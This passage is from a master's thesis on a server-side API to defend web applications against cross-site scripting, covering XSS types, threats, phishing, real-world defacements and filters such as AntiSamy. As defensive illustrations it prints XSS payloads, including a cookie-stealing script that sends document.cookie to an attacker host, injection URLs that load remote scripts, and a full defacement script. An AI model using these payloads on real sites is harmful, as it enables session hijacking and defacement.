SERVER SIDE API TO SECURE XSS
Thesis
Submitted
in partial fulfillment of the requirements for the degree of
MASTER OF
TECHNOLOGY in
COMPUTER SCIENCE & ENGINEERING - INFORMATION
SECURITY
by
KAMESH KUMAR BOGANATHAM
(07IS04F)
DEPARTMENT OF COMPUTER ENGINEERING
NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA
SURATHKAL, MANGALORE -575025
NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA, SURATHKAL ---
D E C L A R A T I O N
I hereby declare that the Report of the P.G. Project Work entitled “SERVER SIDE API TO SECURE XSS” which is being submitted to National Institute of Technology Karnataka Surathkal, for the award of degree of Master of Technology in Computer Science and Engineering – Information Security in the Department of Computer Engineering, is abonafide report of the work carried out by me. The material contained in this report has not been submitted to any university or Institution for the award of any degree
.
07IS04F, B KAMESH KUMAR
---
(
Register Number, Name and Signature of Student) Department Computer EngineeringPlace: NITK, SURATHKAL Date:
C E R T I F I C A T E
This is to certify that the P.G Project Work Report entitled “SERVER SIDE API TO SECURE XSS” submitted by B KAMESH KUMAR (Reg.No. 07IS04F) as the record of the work carried out by him, is accepted as the P.G Project Work Report Submission in partial fulfillment of the requirements for the award of degree of Master of Technology in Computer Science and Engineering – Information Security in the Department of Computer Engineering, National Institute of Technology Karnataka, Surathkal.
External Guide
(Mr. Radhesh Mohandas ) Adjunct Faculty
Department of Computer Engineering NITK Surathkal
Internal Guide
( Mr. Alwyn R Pais) Senior Lecturer
Department of Computer Engineering NITK Surathkal
DEDICATED TO
THEIR LORDSHIPS
ACKNOWLEDGEMENTS
I take this opportunity to express my deepest gratitude and appreciation to all those who have helped me directly or indirectly towards the successful completion of this project.
First and foremost, I would like to express my sincere appreciation and gratitude to my esteemed guides Mr. Radhesh Mohandas, Adjunct Faculty and Mr. Alwyn R Pais, Senior Lecturer, Department of Computer Engineering, NITK Surathkal for their insightful advice, encouragement, guidance, critics, and valuable suggestions throughout the course of my project work. Without their continued support and interest, this thesis would not have been the same as presented here.
I express my deep gratitude to Mr. K. Vinay Kumar, Asst. Professor and Head, Department of Computer Engineering, National Institute of Technology Karnataka, Surathkal for his constant co-operation, support and for providing necessary facilities throughout the M.Tech program.
I would like to take this opportunity to express my thanks towards the teaching and non- teaching staff in Department of Computer Engineering, NITK for their invaluable help and support in these two years of my study. I am also grateful to all my classmates for their help, encouragement and invaluable suggestions.
My special thanks to my parents, supporting family and friends who continuously supported and encouraged me in every possible way for successful completion of this thesis. I am forever indebted to you all.
ABSTRACT
With Internet becoming ubiquitous in every aspect of our life, there is an increase in the web applications providing day to day services like banking, shopping, mailing services, news updates, etc. But most of these applications have vulnerabilities or security loopholes like Cross site scripting (XSS), Cross-site request forgery (CSRF), SQL Injection which are being exploited by the hackers for malicious purposes. Hence there is a need for API’s/automated security tools to identify and/or prevent these vulnerabilities before the application goes live.
This work focuses on developing a server side API for Cross-site Scripting which differentiates XSS attack from simple script. Thus novice users can enjoy the safe and better experience of browsing without any surge of functionality, need of additional software or configuration at browser side. Developing such API also reduces burden to web administrators to safe guard their web applications from malignant XSS attacks.
Keywords: Web Applications, Cross-site Scripting (XSS), Cross-site Request forgery (CSRF/XSRF), Server-side XSS Filter.
i
TABLE OF CONTENTS
Page No. Title Declaration Certificate Dedication Acknowledgement Abstract Table of contents i List of figures iv List of tables v Nomenclature/Acronyms vi Chapter I INTRODUCTION 11.1 Cross-site Scripting Attacks 2
1.2 Motivation 2
1.3 Organization of Thesis 3
Chapter II CROSS-SITE SCRIPTING 4
2.1 Introduction to Cross-site Scripting 4
2.2 A Basic Example 5
2.3 Malicious Code 5
2.4 Classification of Cross-site Scripting 9
2.4.1 Reflected XSS 9
2.4.2 Stored XSS 10
2.4.3 DOM – based XSS 10
ii
2.6 Cross-site Scripting and Phishing 12
2.6.1 Introduction to Phishing 12
2.6.2 Phishing Tricks 13
2.6.3 Cross-Site Scripting based Phishing Attack 14
2.7 Real World Examples 14
2.8 XSS Vs. CSRF 18
Chapter III EXISTING XSS DEFENSES 20
3.1 AntiSamy 21 3.2 The strip_tags() 24 3.3 PHP Input Filter 25 3.4 HTML_Safe/SafeHTML 25 3.5 Kses 26 3.6 htmLawed 28 3.7 Safe HTML Checker 28 3.8 HTML Purifier 29 3.9 Summary 29
Chapter IV PROBLEM STATEMENT 30
Chapter V DIFFERENTIATING XSS FROM SIMPLE
SCRIPTS 31
Chapter VI IMPLEMENTATION DETAILS AND
EXPERIMENTAL RESULTS 39 6.1 Procedure 39 6.2 Implementation Details 40 6.3 Working of SecureXSS 41 6.4 Results 43
iii
REFERENCES 46
APPENDIX I OWASP The Ten Most Critical Web Application Security Vulnerabilities
48
APPENDIX II Results of SecureXSS API 51
APPENDIX III Results of HTML Purifier 80
APPENDIX IV Simple HTML DOM Parser array 95
iv
LIST OF FIGURES
Fig. No. Descripton Page No.2.1 Sample PHP Code for Site Search Engines 6
2.2 Sample HTTP Response Page Containing the <SCRIPT> Tag 6
2.3 Cross-Site Scripting in Site Search Engines 7
2.4 Sample Malicious Code for Cookie Theft 7
2.5 An Attack Scenario of Cross-Site Scripting 8
2.6 Examples of Phishing Tricks 13
2.7 Cross-Site Scripting based Phishing Attack 15
2.8 Maria Sharapova’s Home Page 16
2.9 Defacement 18
6.1 Server-side XSS Filtering API 41
6.2 SecureXSS overhead 44
v
LIST OF TABLES
Table No. Descripton Page No. 3.1 Kses API’s 265.1 Tags and its attributes which are in favour of attackers 31
5.2 Extensions allowed 34
5.3 DOM Properties which will cause XSS attacks 37
6.1 SecureXSS timing test (overhead) results 43
1 OWASP Top 10 Web Application Vulnerabilities 49
2 Results of SecureXSS 51
vi
Nomenclature/Acronyms
Notation Description
XSS Cross-site Scripting
OWASP Open Web Application Security Project
XSRF/CSRF Cross-site Request Forgery
PHP Hypertext Pre Processor
URL Uniform Resource Locator
URI Uniform Resource Identifier
HTML Hyper Text Markup Language
1
CHAPTER 1
INTRODUCTION
With the proliferation of the Internet, there has been a surge in the web services being offered by many corporations like e-banking, e-shopping, etc. As most of these applications are not developed with best security practices, there is an increase in the malicious attacks against these services, which exploits the vulnerabilities in these applications to acquire material gains or to steal the credentials of the novice users who use these web services. This has resulted in more research focus in this domain to create new tools and techniques to subvert these kinds of attacks. There are many research groups in academics and industry working in this domain to find out more secure programming practices and tools to identify the vulnerability of these applications during development phase and attacks during the real time.
The OWASP Top 10 report [OWA] lists the following as the ten most critical web application security vulnerabilities that are been exploited:
Cross Site Scripting (XSS)
Injection Flaws (SQL Injection, XPath Injection, LDAP Injection, etc) Malicious File Execution
Insecure Direct Object Reference Cross Site Request Forgery (CSRF)
Information Leakage and Improper Error Handling Broken Authentication and Session Management Insecure Cryptographic Storage
Insecure Communications Failure to Restrict URL Access
In this work, we focused on Cross-site Scripting (XSS), which facilitates the hacker to insert some malicious script to the web application that may cause any kind of harm to legitimate user. In the process, we developed a server side XSS filtering API, which differentiates Potential XSS attack from the simple XSS and strips it off. The main goal of this work is to provide a XSS
2
solution to web administrators to safe guard their applications from attackers, which results in safe and better experience browsing to lame user without any surge in functionality.
1.1 Cross-site Scripting Attacks
Cross-site scripting attack method was first discussed in a CERT advisory back in 2000 [CER]. But, even today cross-site scripting (XSS) is one of the most common vulnerabilities in web applications. It happens as a result of insufficient filtration of data received from a malicious person and then sent to third parties. Systems that receive data from users and display it on other users' browsers are very vulnerable to an XSS attack. Wikis, forums, chats, web mail - are all good examples of applications most susceptible to XSS.
Cross-site scripting (XSS) can be defined as a security exploit in which an attacker inserts malicious code into a page returned by a web server trusted by a user. This code may reside on the web server or be explicitly inserted when the user browses to the particular web site, it may contain JavaScript or just HTML, and it may use third party sites as sources or rely only upon the resources of the targeted server. The XSS attacks typically involve JavaScript code from a malicious web server executing on a user's web browser. Chapter 2 gives the brief knowledge about XSS attack and its types with examples and illustration.
1.2 Motivation
In the last years, dynamic Web applications such as online banking systems and online shops are becoming more and more popular. At the same time, security attacks that exploit Web application vulnerabilities are increasing dramatically. Among such vulnerabilities, Cross-Site Scripting is the most common security issue (as it is already said, it is the top most vulnerability as per OWASP 2007 report), which enables attackers to steal credentials from a victim to gather sensitive information or cause a Web site to be unavailable. To mitigate such serious impact, Web applications should use an effective solution for Cross-Site Scripting flaws. Manual security testing (for mitigation) is however both expensive and error prone due to the increasing complexity of Web applications. Hence, automated tools for detecting Cross-Site Scripting flaws are essential.
3
We have investigated some available solutions which claim to be state-of-the-art. Unfortunately, most of them are not effective solutions as they fail in differentiating simple scripts from potential XSS attack. Therefore, we have developed SecureXSS (pronounce as Secure Excess), an open-source server-side filter for detecting and filtering Cross-Site Scripting vulnerabilities in Web applications.
1.3 Organization of Thesis
The rest of the thesis is organized as follows. Chapter 2 gives the brief information about XSS attack and its types with live examples and illustration. Chapter 3 deals with the available solutions for XSS, while Chapter 4 describes the problem statement. Chapter 5 details our solution to mitigate XSS which is called SecureXSS: Server-side XSS Filter. Chapter 6 gives the implementation details and experimental results and Chapter 7 concludes the thesis along with the future work, followed by the references used. Appendix I details the Top 10 most critical web application vulnerabilities. Appendix II shows the results of SecureXSS API, while Appendix III
4
CHAPTER 2
CROSS-SITE SCRIPTING
Cross-Site Scripting vulnerabilities are quite widespread. Just taking a look at the Bugtraq mailing list, innumerable postings alarming Cross-Site Scripting holes are listed regularly. As mentioned in the introduction chapter, Cross-Site Scripting vulnerabilities are the most common security loopholes found in over 80 percent of Web sites. Hence, the likelihood that a Web site is XSS vulnerable is extremely high. According to the Information-Technology Promotion Agency (IPA), from July 2004 to September 2005, attacks using Cross-Site Scripting are the most serious issue among all Web application attacks (was accounted for 42%), while SQL Injection is ranked second with 16%. Thus, it is imperative to make Web applications secure against XSS attacks.
In this chapter, we start by briefly explaining the XSS problem with a basic example, and then we give an introduction to malicious code and how XSS attacks work. After presenting the classification of XSS, we describe the risks that XSS may cause.
2.1 Introduction to Cross-site Scripting
As introduced in the previous chapter, Web applications are becoming not only increasingly popular, but also more and more vulnerable. Attack techniques exploiting various types of Web application vulnerabilities are becoming more and more sophisticated. A particular class of these attack techniques is referred to as Cross-Site Scripting (or HTML Code Injection), which takes advantage of the failure of Web applications, that do not validate user input before displaying it back to the user. Such attacks involve commonly three parties: the user (victim), the attacker, and the website, which is XSS vulnerable. The attacker uses the poorly designed legitimate website as a vehicle to execute malicious code (as it was originated from a trusted source) in the user’s browser.
As explained above, XSS attacks occur when an attacker uses a web application to send malicious code (generally in the form of a browser side script,) to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere in a web application, it
5
uses input given by user in the output it generates, without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source and have the malicious script can access cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page [XSS].
2.2 A Basic Example
Most web applications contain site search engines. Such site search engines usually display the results on the screen together with the search phrase entered by users. As an example consider the PHP code shown in figure 2.1, in which the text after “Search results for” is generated dynamically according to the user input. When the search phrase (user input) is not sanitized properly, Cross-Site Scripting may occur which can also be an attack. As illustrated in figure 2.3 (a), after clicking on the search button, we get the search phrase entered in the form field (here search text) displayed in the response page, regardless of the search results. We experiment now with HTML tags, as illustrated in figure 2.3 (b), the search phrase returned (here Hello World) is formatted as bold, instead of displaying the text we entered (Hello World embedded in the HTML tag <b>). Besides displaying the formatted search phrase, we can also cause JavaScript code to be executed in the browser (most browsers enabled JavaScript by default). As illustrated in figure 2.3 (c), in place of showing the search phrase, a JavaScript alert box with the text XSS Vulnerability popped up. It is for the reason that browser interprets the search phrase we entered as HTML tag instead of text. In the sample HTTP response page shown in figure 2.2, the <SCRIPT> tag introduces a JavaScript program and thus it is not displayed by the browser.
2.3 Malicious Code
Considering the example above, one may ask, it just throws up an alert box, how dangerous can it be? Right, alert pop ups are annoying; however they do not really cause security issues. We just use it to demonstrate that a Web application is vulnerable to XSS. If the JavaScript alert function can be executed, there is commonly no reason that other JavaScript functions containing malicious code cannot succeed.
6
Figure 2.1: Sample PHP Code for Site Search Engines
Figure 2.2: Sample HTTP Response Page Containing the <SCRIPT> Tag
(a) Search for a Simple Text
7
(c) Search for an Executable Script
Figure 2.3: Cross-Site Scripting in Site Search Engines
Attackers exploit XSS vulnerabilities in order to execute the injected malicious code. What on earth does malicious code mean? Which impact may it cause? Next, we will give an introduction to malicious code.
Most Web browsers are able to run scripts embedded in Web pages downloaded from a Web server by default. Such scripts are usually written in various scripting languages such as JavaScript and VBScript, which are introduced by the HTML scripting tag <SCRIPT>. In addition to the scripting tags, many other HTML tags (like <IMG> tag) can be misused to load malicious code.
Malicious code is able to rewrite an HTML page with fraudulent content, or redirect the client’s browser to the page of attackers; it can even access authentication cookies, session management tokens, or other sensitive information. With this information, an attacker is able to hijack the victim’s active session and thus, bypass the authentication process completely. Consider the script in figure 2.4, when this script is injected into a page of the site (e.g. www.xss.site) successfully and a victim’s browser loads this page, the embedded script will be executed and store the victim’s cookie from this site. Now, the attacker is able to access the victim’s account and masquerade himself as the victim. (Figure 2.5 illustrates this scenario)
8
Figure 2.5: An Attack Scenario of Cross-Site Scripting
Steps shown in the Figure 2.5 is explained below in details.
(1) A user logs in a XSS vulnerable site.
(2) The site sets cookies (e.g. ID=123) to the user, which is saved in the browser.
(3) An attacker knows that the site displays a parameter without validating (e.g. the parameter “name”), he constructs a link with the malicious code described in figure 2.4 and tricks the user into clicking on this link.
(4) The unsuspecting user clicks on the link and an HTTP request containing the malicious code from the attacker is sent to the XSS vulnerable site.
(5) According to the request, the site generates response page having malicious code embedded and displays this page to the user.
9
(6) While user views the response page, the malicious code gets executed in the user’s browser, cookies of that web site are sent to the attacker.
(7) The attacker has now access to the user’s account and can masquerade himself as the user.
The possible sources of malicious code include URL query string, HTML form fields, HTTP headers and cookies, etc. Since malicious code is embedded in the user’s trusted websites, it is allowed to perform dangerous operations smoothly. Websites using SSL are not more protected against malicious code than those general websites. SSL only encrypts data (including the malicious code) transmitted in the connection, it does not attempt to validate data. Therefore, XSS attacks can be achieved as usual, except that they occur in an encrypted connection.
2.4 Classification of Cross-site Scripting
Generally, Cross-Site Scripting attacks can be classified into three categories: Reflected (non-persistent), Stored (persistent) and DOM - based. Before we describe these three categories, we should learn about DOM, to understand the third type of XSS.
The Document Object Model (DOM) is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML and XML documents. Objects under the DOM (also sometimes called "Elements") may be specified and addressed according to the syntax and rules of the programming language used to manipulate them. In simple terms, the Document Object Model is the way JavaScript sees its containing HTML page and browser state. Next, we will describe these three categories respectively.
2.4.1 Reflected XSS
Reflected XSS (also referred to as non-persistent XSS) is by far the most common type, which implicates that after a request, the page containing malicious code is returned to the Web browser immediately.
Normally, a non-persistent XSS attack requires deceiving a user into visiting a specially manipulated URL with embedded malicious code using social engineering techniques. When a user is tricked into clicking on the malicious link, it causes the code embedded in the URL to be executed in the Web browser, and the attack is achieved.
10
2.4.2 Stored XSS
In contrast to reflected XSS, stored XSS (also referred to as persistent XSS) implicates that when the malicious code is injected to a website; it is stored (in a database or XML files) over a longer period, and displayed to users in a webpage later. This kind of XSS is more serious than other types, because an attacker can inject malicious code just once, and affect a large number of unsuspecting users, it is even hardly necessary for attackers to trick the users into clicking on a link containing malicious code. For example, if the malicious code is stored in a database, without clicking on any link, the innocent user may become victim by just viewing the page that contains the stored malicious code.
There is another kind of stored XSS that uses techniques to manipulate user’s cookies. With such techniques, attackers are able to tamper the cookie content with malicious code and cause the code to be executed each time when the user visits the website.
Examples of web applications, which are especially vulnerable by stored XSS, often include discussion forums, guest books, webmail systems, etc. RSS feeds that are popularly used in web blogs, news sites can also be used as vehicle to achieve such attacks.
Here is the real world example of a persistent XSS attack that occurred on the most popular online auction website eBay. As reported by US-CERT16 in April 2006, when an eBay user posts an auction, <SCRIPT> tags are allowed to be included in the auction description, which creates a XSS vulnerability in the eBay Web site. Attackers are exploiting this vulnerability to redirect auction viewers to a fake eBay login page that requests login information to steal credentials [USC].
2.4.3 DOM – based XSS
Besides the XSS attacks described above, which are considered as standard XSS, there is also a third kind of XSS attack, namely, DOM-based XSS. Unlike the standard XSS attacks, which rely on the dynamic web pages, a DOM-based XSS attack does not require sending malicious code to the server necessarily and thus can also use static HTML pages.
11
The problem is addressed in the client-side script (i.e. JavaScript) within a page itself, which retrieves data from certain DOM objects without encoding the URL characters. The DOM objects mentioned here include:
- document.location - document.URL - document.referrer
We make this clear by means of a simple example. Assuming that the following script resides within a HTML page, this script displays the text retrieved from the current URL somewhere in the page.
<SCRIPT>document.write(document.URL);</SCRIPT>
When we enter the following URL into the address bar in a browser, we will get an alarm box with the text “XSS”, thus it results in XSS hole.
http://www.xss.site/index.html#<script>alert("XSS")</script>
2.5 Threats from Cross-site Scripting
Some of the common threats from XSS attacks are listed below:
Cookie theft and account hijacking: one of the most severe XSS attack involves cookie theft and account hijacking as the scenario illustrated previously in figure 2.5. Credentials stored in cookies can be stolen by attackers, thus it is possible for attackers to steal user’s identity and access his confidential information. For normal users, this means that their personal data such as credit card information or bank account may be misused. For users having high privileges such as administrators, if their accounts are stolen via XSS, attackers are able to access the web server and the backend database system, and thus have the full control of the web application.
Misinformation: another critical threat from XSS is the danger of credentialed misinformation. XSS attacks may include malicious code, which can spy on user’s surf behavior and thus gain statistics (i.e. logging user’s clicks or history of sites visited). Consequently, it results in loss of privacy. Another kind of misinformation is that
12
malicious code is able to modify the presentation of page content, once it is executed in a browser. This enables an attacker to manipulate a press release or important news, even to alter the stock price of companies, which results in loss of integrity. Malicious script may also modify the login page, together with Phishing; a victim may submit his login information to the attacker unconsciously.
Denial of Service: In view of an enterprise, it is imperative that their Web applications are should be accessible all the time. However, malicious script can lead to loss of availability. For example, it can redirect users’ browser to other websites. The spread of the XSS worm on Myspace.com described previously is another example of a Denial of Service attack. In view of users, malicious script can also make a user’s browser crash or become inoperable (i.e. by throwing infinitely many alert boxes), so that the user cannot reach the Web application any more.
Browser exploitation: malicious script can redirect client browsers to an attacker’s site, so that the attacker is able to take advantage of specific security hole in web browsers to control users’ computer by executing arbitrary commands, such as to install Trojan horse programs on the client or upload local data containing sensitive information.
2.6 Cross-site Scripting and Phishing
This part of the thesis will give a brief explanation about phishing kind of cross site scripting. Section 2.6.1 Will give introduction about phishing and Section 2.6.2 will explain some tricks of the phishing, while Section 2.6.3 explains cross-site scripting based phishing attacks. 2.6.1 Introduction to Phishing
Phishing (as in fishing for sensitive data), is the act of tricking someone into giving them sensitive information like credit card numbers, passwords, bank account information, or other personal data using social engineering techniques [STA, OLL].
Phishing uses usually emails as medium, which look like coming from banks, ask users to log into their online-banking system, or change their password, or input their credit card number. In the last years, Phishing has become a major issue, according to the Pew Study [PEW], in
13
October 2005, more than a third of email users suffered Phishing, and two percent have responded by providing personal financial information.
(a) Similar or Misspelled Domain Names
(b) URL Hex Encoding
(c) Using HTML Coding to Hide the Real Link
Figure 2.6: Examples of Phishing Tricks
2.6.2 Phishing Tricks
Tricks commonly used for Phishing include:
Similar or misspelled domain names (see figure 2.6(a)). Phisher’s may also substitute the lowercase of “L” with the uppercase of “I”, because they are hard for the users to distinguish.
Using encoded URL. These tricks are used to encode the URL to disguise its true value by using Hex, Unicode, or UTF-8 encoding. An example of Hex Encoding is illustrated in figure 2.6(b).
Using HTML coding to hide the real link (see figure 2.6(c)). The real link is not directly visible to the user. As soon as he clicks the link, he is taken to the fake site of the attacker instead of the site indicated.
Using fake banner advertising. Phisher’s can use copied banner advertising and publish it on the Internet. Similar to the example above, the destination is linked to the fake site, and it is not directly visible to the users.
14
2.6.3 Cross-Site Scripting based Phishing Attack
The Phishing tricks described above misdirect users to fake sites. But if the Phishing site is the real site, this kind of Phishing attack is more dangerous, since users trust the real site. Such attacks can be achieved, when a site is XSS vulnerable. The example below will demonstrate sample of this attack.
For a Cross-site Scripting based Phishing attack; the following steps should be taken:
1. Finding Cross-site Scripting vulnerabilities in a site.
2. Embedding malicious content into a fraudulent email. Attacker could use encoded URL to obfuscate the true destination.
3. Sending the spoofed email to victims.
When a user clicks the link in the spoofed email, the login part of the page returned is replaced with the fake login page from the attacker’s site, other contents of the page and the address bar remain unchanged. The user is not aware of this and logs in with his personal information, which will be sent to the attacker. After login, the user will be redirected back to the real site. Figure 2.7 illustrates this scenario.
XSS based Phishing attacks can bypass the traditional Phishing defenses such as blacklists, SSL notices, etc. The first step to achieve XSS based Phishing attack is to find XSS vulnerabilities in an insecure Web site.
2.7 Real World Examples
On April 1, 2007, there was an interesting prank on Maria Sharapova’s (the famous Tennis player) home page (Figure 2.8). Apparently someone has identified an XSS vulnerability, which was used to inform Maria’s fan club that she is quitting her carrier in Tennis to become a CISCO CCIE Security Expert.
15
http://www.mariasharapova.com/defaultflash.sps?page=//%20--%3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/upload/story.js%3E%3C/scri pt%3E%3C!--&pagenumber=1
16
Notice that the actual XSS vulnerability affects the page GET parameter, which is also URL-encoded. In its decoded form, the value of the page parameter looks like this:
// --></script><script src=http://www.securitylab.ru/upload/story.js></script><!--
The XSS payload is quite simple. The character sequence // --> comments out everything generated by the page up until that point. The second part of the payload includes a remote script hosted at www.securitylab.ru. And finally, the last few characters on the URL make the rest of the page disappear.
Figure 2.8 Maria Sharapova’s Home Page
The script hosted at SecurityLab has the following content:
document.write("<h2><font color=#FFFFFF>Maria Sharapova</font></h2>");
document.write("<font color=#FFFFFF>Maria Sharapova is glad to announce you her new decision, which changes her all life for ever. Maria has decided to quit the
carrier in Tennis and become a Security Expert. She already passed Cisco exams and now she has status of an official CCIE.</font><p><img
src=http://www.securitylab.ru/_Article_Images/sharapova01.jpg><p><font
color=#FFFFFF>Maria is sure, her fans will understand her decision and will respect it. Maria already accepted proposal from DoD and will work for the US government. She also will help Cisco to investigate computer crimes and hunt hackers
down.</font></p><p><img
src=http://www.securitylab.ru/_Article_Images/sharapova02.jpg></p><p><!--");
17
Let’s have a look at the following example provided by RSnake from ha.ckers.org. RSnake hosts a simple script (http://ha.ckers.org/weird/stallowned.js) that performs XSS defacement on every page where it is included. The script is defined like this:
var title = "XSS Defacement"; var bgcolor = "#000000";
var image_url = "http://ha.ckers.org/images/stallowned.jpg"; var text = "This page has been Hacked!";
var font_color = "#FF0000";
deface(title, bgcolor, image_url, text, font_color);
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) { document.title = pageTitle;
document.body.innerHTML = ''; document.bgColor = bgColor;
var overLay = document.createElement("div"); overLay.style.textAlign = 'center';
document.body.appendChild(overLay); var txt = document.createElement("p");
txt.style.font = 'normal normal bold 36px Verdana'; txt.style.color = fontColor;
txt.innerHTML = pageText; overLay.appendChild(txt); if (image_url != "") {
var newImg = document.createElement("img"); newImg.setAttribute("border", '0');
newImg.setAttribute("src", imageUrl); overLay.appendChild(newImg);
}
var footer = document.createElement("p");
footer.style.font = 'italic normal normal 12px Arial'; footer.style.color = '#DDDDDD';
footer.innerHTML = title; overLay.appendChild(footer); }
In order to use the script we need to include it the same way we did when defacing Maria Sharapova’s home page. In fact, we can apply the same trick again. The defacement URL is:
http://www.mariasharapova.com/defaultflash.sps?page=//%20--
%3E%3C/script%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script %3E%3C!--&pagenumber=1
The result of the defacement is shown on Figure 2.9. Website defacement, XSS based or not, is an effective mechanism for manipulating the masses and establishing political and non-political points of view. Attackers can easily forge news items, reports, and important data by using any of the XSS attacks. It takes only a few people to believe what they see in order to turn something fake into something real.
18
Examples explained here are taken from [JEG], refer the same for many more real world XSS attacks and examples.
Figure 2.9 Defacement
2.8 XSS Vs. CSRF
Cross-Site Scripting (XSS) and Cross-site Request Forgery (CSRF) attacks are frequently confused as they are clearly related [RRO]. Both attacks are aimed at the user and often require the victim to access a malicious web page. Also the potential consequences of the two attack vectors can be similar: The attacker is able to submit certain actions to the vulnerable web application using the victim's identity. The causes of the two attack classes are different though. A web application that is vulnerable to XSS fails to properly sanitize user provided data before including this data on a webpage, thus allowing an attacker to include malicious JavaScript in the web application. This JavaScript consequently is executed by the victim's browser and initiates the malicious requests. XSS attacks have more capabilities beyond the creation of http request and are therefore more powerful than CSRF attacks. A rogue JavaScript has almost unlimited power over the webpage it is embedded in and is able to communicate with the attacker. As an example, XSS can obtain and leak sensitive information.
Cross Site Scripting (XSS) exploits the trust that a client has for the website or application. Users generally trust that the content displayed in their browsers is same as that it is
19
intended to be displayed by the website being viewed. In contrast, CSRF exploits the trust that a site has for the user. The website assumes that if an 'action request' was performed, it believes that the request is being sent by the user [ROB].
An attacker exploits a lack of input and / or output filtering in the case of XSS flaw. Filtering out the dangerous characters like <, >, “, ‘, &, ;, or # in an application could resolve the XSS flaw. XSS is related to the application performing insufficient data validation. XSS flaws may allow bypassing of any CSRF protections by leaking valid values of the tokens, allowing Referrer headers to appear to be an application itself, or by hosting hostile HTML and JavaScript elements right in the target application. Therefore resolving XSS flaws should be given priority over CSRF weaknesses [CSRF].
XSS aimed at inserting active code in an HTML document to either abuse client-side active scripting holes, or to send privileged information (e.g. authentication/session cookies) to a attacker controlled site. CSRF does not in any way rely on client-side active scripting, and its aim is to take unwanted, unapproved actions on a site where the victim has some prior relationship and authority.
Where XSS sought to steal the online trading cookies so an attacker could manipulate the victim’s portfolio, CSRF seeks to use the victim’s cookies to force the victim to execute a trade without his knowledge or consent.
20
CHAPTER 3
EXISTING XSS DEFENSES
There is dire need for web applications to provide users with the ability to format their profile or postings using Hypertext Markup Language / Cascading Style Sheet (HTML/CSS). To attain that functionality, developers must allow users to provide their own source code directly or give the user an intermediate language with which the user can work.
As the simple solutions, there are many lightweight markup languages apart from HTML available like BBCode [BBC], Wikitext [WIT], Markdown [MAD], Textile [TEX], WYSIWYG, which will be parsed by message board system before being translated to markup language that web browsers understand (can be HTML or XHTML).
An example intermediate language code for rendering green text can be shown below.
[color=green]Sample Text[/color]
After translation the above code would be rendered to the user’s browser in the target language, HTML/CSS as seen below
<font color=”green”> Sample Text </font>
This is a safe approach in general because it does not allow users to specify arbitrary target language code which can be obfuscated and disguised using various encoding and fragmenting techniques. By providing an intermediate language and interpreting it in a top-down fashion the application can only render the subset of HTML functionality that they wish to interpret.
There is a practical problem with this approach. The user will be fairly limited in formatting code because of limited instruction set provided by the web application is unlikely to ever be as complete as the HTML/CSS specifications. However the attributes/ values provided with the attributes in any of these markup languages are not vulnerable, still they face problems related to the way they translate the unknown markup language into secure HTML/XHTML (i.e., the translated HTML cannot be secure).
21
The other option when providing formatting capability is to allow users to input HTML/CSS directly. If user’s input cannot be trusted, it is imperative that the application be able to detect and remove any malicious code. To detect and remove such malicious code, there are some solutions developed. In this Chapter we’ll see such solutions one by one in detail.
3.1 AntiSamy
The primary focus of developers while developing AntiSamy [ANT] (in reference to Samy Kamkar’s now infamous MySpace XSS worm.) is to create a XSS filter that works on a positive and customizable security model. The secondary focus was to make this tool as user friendly as possible so as to allow applications using it to communicate to the user how their input was filtered or how they could tune it themselves in order to accommodate a more successful filter.
AntiSamy first sanitizes the user given input using NekoHTML to avoid false positives because of unbalanced start or end markers. NekoHTML is a Java API that transforms unbroken of any version into clean XHTML 1.0, which is also standalone of its kind.
The main validation processing takes place in a depth-first fashion. Starting with the root, each node is processed according to the specifications inside the security model XML file given with the node name (e.g., html or input). There are three modes of validation (also called processing actions): filter, truncate and validate and they are each described in the following section.
Filter
The filter processing action performs no validation per se, but only removes the start and end tags, promoting the tag’s contents. This sanitization is useful in many cases. For example, if you decided you wouldn’t like users to input meta tags that could mess with your robot indexing, setting filter would have the effect demonstrated below.
User Input: <meta name=”expires;-1;www.phishingsite.com”>This is some text.</meta>
22
Truncate
When the truncate processing action is set, no actual validation takes place. The truncate action simply removes all the attributes and child nodes of a tag, making validation of its attributes unnecessary. A number of tags should be set to truncate.
User Input: <br unknownAttributeAttack=”1attack”onClick=”alert(document.cookie)”>
Output after Truncating: <br/>
Many formatting tags are set to truncate in the default policy file, including em, small, big, i, b, u, center, pre and more.
Validate
The validate processing action is where the meat of the filtering logic resides. If there are no attributes defined for a tag by the policy file, the validate processing action will act the same as the truncate processing action, except the child nodes will be validated instead of removed.
The validate action steps through each of the attributes in the tag to be filtered and checks if there is a corresponding entry for that tag and attribute combination in the policy file. If no entry is found, the attribute is simply removed. If there is an entry, the filter tries to validate its value against the rules in the entry.
There are two ways for an attribute value to be validated; by being equal to a literal string value or by the matching of a regular expression. Accordingly, each attribute’s definition in the policy can have a list of valid literal strings and a list of regular expressions to match. This is a departure from other XSS filters (and other security tools, in general) that don’t allow for multiple ways to specify valid values, which force the user into writing overly complex (and likely incomplete or unpredictable) regular expressions.
When an attribute does not pass a validation check, one of a few onInvalid actions is taken. The possible onInvalid actions dictate what to do with the tag and its contents. The set of
23
onInvalid actions includes removeTag, filterTag and removeAttribute. The default action is
removeAttribute.
If an attribute with the removeTag set for its onInvalid action fails validation, the tag holding the attribute being checked and its contents will be removed entirely. This onInvalid
action is reserved for those attributes, which when removed, make the presence of the tag meaningless. An example usage of this setting is displayed below.
Welcome, my name is <script>
var cke = document.cookie;
var url= ‘http://evil.rt/cookie.cgi’+cke; document.location = url;
</script>
and I’m 25 years old!
Above shown is the message posted by user. The result after failing to validate this code is shown below.
Welcome, my name is and I’m 25 years old!
If an attribute with an onInvalid action set to filterTag fails validation, the start and end tag of the node will be removed while the contents are promoted. This is exactly what happens in the filter processing action. The process can be seen below.
<a href=”javascript:alert(‘xss’)”>Click on this!</a>
Above shown is the message posted by user. The result after passing this message to AntiSamy will be:
Click on this!
The default onInvalid action is removeAttribute. When this onInvalid action is set (or if none is set) on an attribute that fails validation, the attribute itself is removed from the tag, but the tag and its contents will remain. The process is shown below.
24
